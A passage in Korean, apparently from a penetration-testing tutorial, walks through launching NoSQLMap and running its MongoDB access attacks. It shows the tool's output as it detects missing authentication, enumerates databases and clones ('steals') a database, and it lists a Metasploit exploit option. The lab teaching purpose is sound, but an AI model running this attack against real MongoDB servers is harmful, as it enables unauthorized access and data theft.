3.7.1 NoSQLMap 시작

cd /opt/NoSQLMap

python nosqlmap.py

• 1-Set options 선택

- 대상 호스트 IP(여러분의 MongoDB IP) 옵션 설정

- 로컬 MongoDB/Shell IP 설정(여러분의 IP)

- b : 옵션 파일 저장

- x : 나가기

• 2-NoSQL DB Access Attacks 선택

공격을 시작했다면 다음과 같은 내용이 나올 것이다.

DB Access attacks (MongoDB)

=================

Checking to see if credentials are needed...

Successful access with no credentials!

MongoDB web management open at http://192.168.199.128:28017. No authentication required!

Start tests for REST Interface (y/n)? y

REST interface not enabled.

1-Get Server Version and Platform

2-Enumerate Databases/Collections/Users

3-Check for GridFS

4-Clone a Database

5-Launch Metasploit Exploit for Mongo < 2.2.4

6-Return to Main Menu

Select an attack: 1

Server Info:

MongoDB Version: 2.0.6

Debugs enabled: False

Platform: 32 bit

Select an attack: 2

List of databases:

local

admin

users

appUserData

Select an attack: 4

Select a database to steal: 5

Does this database require credentials (y/n)? n

Database cloned. Copy another (y/n)? n